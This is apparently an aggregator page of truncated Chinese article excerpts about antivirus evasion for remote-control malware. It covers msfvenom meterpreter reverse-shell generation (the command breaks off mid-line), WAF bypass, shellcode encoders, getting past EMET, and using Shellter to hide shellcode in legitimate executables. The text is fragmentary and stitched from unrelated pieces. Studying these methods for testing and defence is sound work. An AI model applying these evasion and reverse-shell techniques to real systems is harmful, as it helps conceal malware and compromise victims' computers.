0x01 环境搭建
测试系统:windows10 (1909)
杀毒软件:360安全卫士
在线杀毒:VT
0x02 payload生成
msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 L
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
本专题
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章导
0×00 前言
现在软waf多如牛毛,各大厂商的安全工具如360主机卫士,安全狗,云锁之类的软waf进行拦截,经常碰到如下拦截提示:
看到以上三个拦截提示就让人头疼不已,欲罢不能。so,就在网上搜索各种绕过waf的资料,结合别人的思路和个人经验,写下这篇文章。
本专题文章导航
1、远控免杀专题文章(1)-基础篇:https://www.secpulse.com/archives/123295.html
2、远控免杀专题文章(2)-msfvenom隐藏的参数:https://www.secpulse.com/archi
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
《
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!&
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!&
发布时间:
2020-03-04 13:07 |
阅读:62637 | 评论:0 |
标签:
系统安全 C++ 免杀 远控
我们在上一篇提到要要自定义shellcode,不过由于这是个复杂的过程,我们只能专门写一篇了,本文,我们将会给大家介绍shellcode的基本概念,shellcode在编码器及解码器中的汇编以及几种绕过安全检测的解决方案,例如如何绕过微软的 EMET(一款用以减少软件漏洞被利用的安全软件)。为了理解本文的内容,大家需要具了解x86汇编知识和基本文件格式(如COFF和PE)。专业术语进程环境块(PEB):PEB(Process Environment Block)是Windows NT操作系统中的一种数据结构。
发布时间:
2017-03-23 05:40 |
阅读:178719 | 评论:0 |
标签:
技术 免杀
在渗透测试期间,目标服务器如果是Windows的,目标服务器可能安装有JAVA版管理管理控制程序(例如:WAS、JBOSS和Tomcat),该服务器具有默认或者是可猜测(可以进行爆破攻击)的管理凭据。
所谓免杀指的就是恶意软件为了防止杀毒软件、防病毒软件对其进行逃避检查的一种技术。恶意软件的分类,包括病毒、木马、蠕虫、键盘记录、僵尸程序、流氓软件、勒索软件、广告程序等在用户非自愿的情况下通过系统漏洞或者通过欺骗诱导、打包执行安装到系统里面的程序。这些恶意软件都带有很强的目的性,有的是为了控制操作系统,有的是为了窃取信息,或者把可通过操作系统读取的高价值信息文件加密进而勒索;有的软件会出于偷窥目的,打开电脑的声音或者摄像头等设备,偷窥我们的生活隐私;还有一种是利用你的计算机的处理能力,利用你的带宽对其他IP地址发起攻击等,类似一种僵尸程序。
在渗透测试中,当你需要执行如meterpreter等的payload,而又需要做免杀时,下面这段代码编译的exe也许会对你产生帮助。你需要做的就是上传这两个文件,同目录下的可执行exe文件和payload文件。
平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。
常见的端口转发
lcx.exe
nc.exe
Using php/jsp/aspx Script
iptables端
或许你还在为无法绕过反病毒软件获得Meterpreter shell而懊恼,试试Shellter 5.1吧。首先需要获取一个正常的Windows exe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。Shellter有一个自动模式,该模式会使整个操作过程变得十分的简单。在这篇文章中,我使用Kali 2.0作为主机,另外一台Windows作为靶机。0×01 磨刀:Kali中不包含最新版本的Shellter,如果要获取最新版本需要下载、解压ZIP文件。